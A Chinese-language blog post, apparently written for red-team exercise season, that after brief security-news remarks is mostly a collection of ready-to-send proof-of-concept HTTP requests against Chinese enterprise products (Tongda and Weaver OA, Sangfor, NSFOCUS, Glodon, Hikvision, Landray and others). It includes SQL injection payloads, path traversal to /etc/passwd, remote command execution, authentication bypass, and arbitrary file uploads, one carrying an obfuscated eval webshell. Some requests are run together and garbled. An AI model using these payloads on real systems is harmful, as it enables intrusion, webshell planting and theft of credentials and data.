—
先来说说安全行业信息吧。。。。
还是那句话“没有网络安全,就没有国家安全”
重拳出击!国家安全机关破获美国中央情报局间谍案
hvv行动还有有必要的
护网行动技战法
看来大家都喜欢这个战法
想得太累 还是让人工智能写吧
做正事吧
通达OA sql注入漏洞CVE-2023-4165 POC
GET/general/system/seal_manage/iweboffice/delete_seal.php? DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count()%20fr om%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1HTTP/1.1Host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2AcceptEncoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests:11GET /general/system/seal_manage/dianju/delete_log.php? DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count()%20f
泛微 OA 代码执行 EXP
Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传。
Weaver E-Office9.0
泛微 Weaver E-Office9 前台文件包含
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传
POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: /
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type:multipart/form-data;boundary=—-WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition:form-data; name=”MAX_FILE_SIZE”
10000000
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition:form-data; name=”upfile”; filename=”vulntest.php”
Content-Type: text/plain
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name=”submit_post”
obj_app_upfile
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name=”hash“
0b9d6b1ab7479ab69d9f71b05e0e9445
——WebKitFormBoundaryJpMyThWnAxbcBBQc–
木马路径:attachements/xxx.php
网神 SecSSL 3600安全接入网关系统 任意密码修改
POST /changepass.php?type=2
Cookie:admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={“this_name”:”test”,”subAuthId”:”1”}
old_pass=&password=Test123!@&repassword=Test123!@
深信服应用交付命令执行
POST /rep/login
Host:URL
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
深信服报表任意读取
GET/report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:85
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
绿盟sas安全审计系统任意文件读取漏洞
/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd
绿盟SAS堡垒机Exec远程命令执行漏洞
/webconf/Exec/index?cmd=要执行的命令
广联达后台文件上传
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept:text/html,application/xhtml+xml, image/jxr, /
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent:Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: /
Origin: http://10.10.10.1
Cookie:
Connection: close
Content-Length: 421
——WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition:form-data; filename=”1.aspx”;filename=”1.jpg”
Content-Type: application/text
<%@ Page Language=”Jscript” Debug=true%>
<%
var FRWT=’XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD’;
var GFMA=Request.Form(“qmq1”);
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>
——WebKitFormBoundaryFfJZ4PlAZBixjELj–
广联达OA SQL注入
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept:text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type:application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1’ UNION ALL SELECT top 1812 concat(F_CODE,’:’,F_PWD_MD5)from T_ORG_USER –
通达
CVE-2023-4166
本次范围:通达OA版本11.10之前
post请求包
金山办公
WPS 命令执行
wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120
WPS Office 2019 企业版 < 11.8.2.12085
在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)
漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
代码块在底下。(需要原pdf加wechat)
海康威视
HIKVISION iSecure Center综合安防管理平台文件上传
POST请求包
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Length: 258
Content-Type:multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
–e54e7e5834c8c50e92189959fe7227a4
Content-Disposition:form-data;name=”file”; filename=”../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt”
Content-Type: application/octet-stream
9YPQ3I3ZS
蓝凌OA
前台代码执行
POST/sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type:application/x-www-form-urlencoded
var={“body”:{“file”:”file:///etc/passwd”}}
安恒明御运维审计与风险控制系统堡垒机任意用户注册
POST/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie:LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua:”NotA;Brand”;v=”99”,”Chromium”;v=”100”,”Google Chrome”;v=”100”
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: “Windows”
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
汉得SRM tomcat.jsp 登录绕过漏洞 POC
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
POST /api/user/logincaptcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin’and(se lect*from(select+sleep(3))a)=’
分别访问后 直接访问后台。
辰信景云终端安全管理系统 login SQL注入漏洞 POC
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin’and(select*from(select+sleep(3))a)=’
用友 移动管理系 统 uploadApk.do 任意文件上传漏洞
未完。。。。。。